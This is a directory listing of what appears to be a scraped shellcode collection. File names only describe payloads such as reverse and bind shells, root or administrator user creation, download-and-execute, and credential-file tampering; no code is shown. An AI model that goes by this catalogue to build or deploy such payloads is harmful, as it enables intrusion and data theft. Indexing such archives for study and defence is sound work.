├── Generator ├── ARM_-_Add_Root_User_Shellcode__Metasploit___66+_bytes___Generator___Shellcode_exploit_for_Generator_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── ARM_-_execve___bin_sh_,____bin_sh__,_NULL__Polymorphic_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── FreeBSD_x86_-_Reverse_TCP__bin_sh_Shell__127_0_0_1:1337_TCP__Shellcode__81_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_Reverse_TCP_Multi_Dual_Mode_Shell_Shellcode__129_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_execve__bin_sh_Polymorphic_With_Printable_ASCII_Characters_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_write___+_exit_0__Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_MIPS_-_XOR_Encoder_Shellcode__60_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86-64_-_Reverse_TCP_Semi-Stealth__bin_bash_Shell_Shellcode__88+_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__1234_TCP__Shellcode__87_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Command_Generator_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Create_File_With_Permission_7775_+_exit_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Custom_execve_Shellcode__Encoder_Decoder___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Reverse_TCP_Shell_Shellcode__90_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Reverse_TCP__bin_sh_Shell__192_168_13_22:31337_TCP__Shellcode__82_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Shellcode_Obfuscator_Null-Free__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Typewriter_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_execve_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Solaris_SPARC_-_Reverse_TCP_Shell__44434_TCP__XNOR_Encoded_Shellcode__600_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Solaris_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_-_Download_File_+_Execute_via_DNS__IPv6__Shellcode__Generator___Metasploit___Shellcode_exploit_for_Generator_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── Windows_-_Reverse_TCP_Shell__127_0_0_1:123_TCP__Alphanumeric_Shellcode__Encoder_Decoder___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_2000_2003_-_Reverse_TCP_Shell__127_0_0_1:53_TCP__Shellcode__275_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_SP1_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP___10_-_Command_Generator_WinExec_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_x86-64_-_Download_File_+_Execute_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Execute_Shellcode__Browsers_Edition___275+_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_x86_-_Multi-Format_Encoding_Tool_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c └── _Generator__-_HTTP_1_x_Requests_Shellcode__18+_26+_bytes___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Lin_x86-64 ├── Linux_x86-64_-_Add_Root_User__shell-storm_leet__Shellcode__390_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Add_Root_User__t0r_Winner__Shellcode__189_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_Ncat_Shell__4442_TCP____SSL___Multi-Channel__4444-4447_TCP____Persistant___Fork___IPv4_6___Password_Null-Free_Shellcode__176_bytes___Shel__ │ └── shellcode.c ├── Linux_x86-64_-_Bind_Netcat_Shell_Null-Free_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__4442_TCP____Syscall_Persistent___Multi-Terminal__4444-4447_TCP____Password__la_crips____Daemon_Shellcode__83_148_177_bytes___S__ │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__81_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__87_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Password__1234__Shell__31173_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Password__hack__Shell__4444_TCP__Null-Free_Shellcode__162_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__1472_TCP___IPv6__Shellcode__199_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__4444_TCP__+_Password__Z~r0__Null-Free_Shellcode__81_96_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__4444_TCP__Null-Free_Shellcode__103_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Disable_ASLR_Security_Shellcode__143_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Download_File__http:__192_168_30_129_pri_sh__+_Execute_Used_To_Steal_Information_Shellcode__399_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__18_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__38_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Fork_Bomb_Shellcode__11_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Kill_All_Processes_Shellcode__19_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Encoded_Shellcode__57_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Polymorphic_Shellcode__31_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Stack_Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_XOR_Encoded_Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_XOR_NOT_DIV_Encoded_Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve___bin_sh_0_,NULL,NULL_;_Position_Independent_Alphanumeric_Shellcode__87_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve___sbin_iptables_,____sbin_iptables_,__-F__,_NULL__Shellcode__49_bytes___Shellcode_exploit_for_Lin_x86-64___ │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_bash_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_-c_reboot_Shellcode__89_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Null-Free_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__21_Bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__26_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__34_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__52_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Via_Push_Shellcode__23_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_mkdir_Shellcode__25_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c └── Linux_x86-64_-_mkdir____evil__Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Lin_x86 ├── Linux_IA32_-_execve__bin_sh_0xff-Free_Shellcode__45_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_i686_-_pacman_-R__package__Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_i686_-_pacman_-S__package___default_package:_backdoor__Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Obfuscated_Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Shellcode__77_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User_Shellcode__104_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__r00t__To__etc_passwd_Shellcode__69_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__t00r__Anti-IDS_Shellcode__116_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__t00r__Shellcode__82_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__toor__To__etc_passwd_+_exit___Shellcode__107_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__xtz__To__etc_passwd_Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__z__Shellcode__70_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Alphanumeric_Encoded_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Alphanumeric_Encoder__IMUL_Method__Shellcode__88_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Anti-Debug_Trick__INT_3h_trap__+_execve__bin_sh_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Append_RSA_key_to__root__ssh_authorized_keys2_Shellcode__295_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__13377_TCP__Shellcode__Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__5555_TCP__Shellcode__60_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__98_TCP_+_UDP__Shellcode__44_52_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__13337_TCP__Shellcode__56_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__17771_TCP__Shellcode__58_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__8080_TCP__Shellcode__75_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___usr_bin_netcat___bin_sh_Shell__6666_TCP__+_Polymorphic_XOR_Encoded_Shellcode__69_93_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Listener__5555_TCP__+_Receive_Shellcode_+_Payload_Loader_Shellcode__83_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__2707_TCP__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__31337_TCP__+_setreuid_0,0__Polymorphic_Shellcode__131_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__+_fork___Shellcode__130_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__ToUpper_Encoded_Shellcode__226_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_bash_Shell__4444_TCP__Shellcode__656_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Password__gotfault__Shell__64713_TCP__Shellcode__166_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__1472_TCP___IPv6__Shellcode__1250_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__+_fork___Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__+_setuid_Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__100_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__80_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__33333_TCP__Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__Null-Free_Shellcode__75_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__XOR_Encoded_Shellcode__152_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__64533_TCP__Shellcode__97_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__64713_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__8000_TCP__Shellcode__179_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__44_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_zsh_Shell__9090_TCP__Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__bin_rm_-rf___+_Attempts_To_Block_The_Process_From_Being_Stopped_Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__sys_chmod_syscall__chmod_0777__etc_passwd_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__sys_chmod_syscall__chmod_0777__etc_shadow_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c └── Linux_x86__Intel_x86_CPUID__-_execve__bin_sh_XORED_Encoded_Shellcode__41_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux ├── Linux_-_Bind_Netcat_Shell__31337_TCP__Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Bind_TCP_Dual_Multi_Mode_Shell_Shellcode__156_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Bind_TCP_Shell__6778_TCP__XOR_Encoded_Polymorphic_Shellcode__125_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Find_All_Writeable_Folder_In_FileSystem_Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Write_SUID_Root_Shell___tmp__hiddenshell__Polymorphic_Shellcode__161_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_execve___bin_sh_,_NULL,_0__Multi_Dual_Mode_Shellcode__37_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_setreuid_0,0__+_execve___bin_sh_,NULL,NULL__XOR_Encoded_Shellcode__62_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_x86_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__251_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_x86_x86-64_-_Read__etc_passwd_Shellcode__156_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c └── Linux_x86_x86-64_-_Reverse_TCP_Shell__192_168_1_29:4444_TCP__Shellcode__195_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Multiple ├── BSD___Linux___Windows_x86_x86-64_-_execve___bin__sh_,_____bin_sh_,__-c_,__cmd__,_NULL__Execute_Command_Shellcode__194__ │ └── shellcode.c ├── BSD_x86___Linux_x86_-_execve__bin_sh_Shellcode__38_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_PPC___Linux_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__99_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_x86___Unix_SPARC_-_execve__bin_sh_Shellcode__80_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_x86___Unix_SPARC___IRIX_MIPS_-_execve__bin_sh_Shellcode__141_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c └── OSX_PPC___OSX_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__121_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── README.md ├── Spider.py ├── Win_x86-64 ├── Windows_10_x64_-_Egghunter_Shellcode__45_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_2003_x64_-_Token_Stealing_Shellcode__59_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_7_Professional_SP1_x64__FR__-_Beep_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_7_x64_-_cmd_Shellcode__61_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_API_Hooking_Shellcode__117_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Add_Administrator_User__ALI_ALI__+_Add_To_RDP_Group_+_Enable_RDP_From_Registry_+_STOP_Firewall_+_Auto_Start_Terminal_Service_Obfuscated_Shellco__ │ └── shellcode.c ├── Windows_x64_-_Bind_TCP_Password__h271508F__Shell__2493_TCP__Shellcode__825_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Bind_TCP_Shell__4444_TCP__Shellcode__508_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_CreateRemoteThread___DLL_Injection_Shellcode__584_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Download_File__http:__192_168_10_129_pl_exe__+_Execute__C:_Users_Public_p_exe__Shellcode__358_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Reverse_TCP_Shell__192_168_232_129:4444_TCP__+_Injection_Shellcode__694_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-__URLDownloadToFileA__Download_File__http:__localhost_trojan_exe__+_Execute_Shellcode__218+_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c └── Windows_x64_-_cmd_exe_WinExec___Shellcode__93_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Win_x86 ├── Windows_-_DCOM_RPC2_Universal_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_5_0___7_0_x86_-_Bind_TCP_Shell__28876_TCP__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_5_0___7_0_x86_-_Speaking__You_got_pwned!__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_7_x86_-_Bind_TCP_Shell__4444_TCP__Shellcode__357_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_7_x86_-_localhost_Port_Scanner_Shellcode__556_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__29_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__31_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_Reverse_Generic_without_Loader__192_168_1_11:4919__Shellcode__249_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_NT_2000_XP__Russian__-_Add_Administartor_User__slim_shady__Shellcode__318_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_NT_XP_x86_-_IsDebuggerPresent_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_PerfectXp-pc1_SP3_x86__Turkish__-_Add_Administrator_User__kpss_12345__Shellcode__112_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_SP1_SP2_x86_-_Beep_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_XP_-_Download_File__http:__www_elitehaven_net_ncat_exe__+_Execute__nc_exe__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_XP_Home_SP2__English__-_calc_exe_Shellcode__37_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows__Net_Framework_x86_-_Execute_Native_x86_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Add_Administrator_User__ALI_ALI__+_Add_To_RDP_Group_+_Enable_RDP_From_Registry_+_STOP_Firewall_+_Auto_Start_Terminal_Service_Obfuscated_Shellco__ │ └── shellcode.c ├── Windows_x86_-_Add_Administrator_User__GAZZA_123456__+_Start_Telnet_Service_Shellcode__111_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Add_Local_Administrator_User__secuid0_m0nk__Shellcode__326_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Bind_TCP_Password__damn_it!$$##@;*#__Shell_Shellcode__637_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Command_WinExec___Shellcode__104+_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_ConnectBack_+_Download_A_File_+_Save_+_Execute_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_CreateProcessA_cmd_exe_Shellcode__253_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Execute_Shellcode__192_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Run_via_WebDAV____192_168_1_19_c__Null-Free_Shellcode__96_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File__http:__127_0_0_1_file_exe__+_Execute_Shellcode__124_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File__http:__www_ph4nt0m_org_a_exe__+_Execute__C:_a_exe__Shellcode__226+_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Egg_Omelet_SEH_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Egghunter_Checksum_Routine_Shellcode__18_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Eggsearch_Shellcode__33_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Executable_Directory_Search_Null-Free_Shellcode__130_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Hide_Console_Window_Shellcode__182_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_InitiateSystemShutdownA___Shellcode__599_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_JITed_Stage-0_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_JITed_exec_notepad_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c 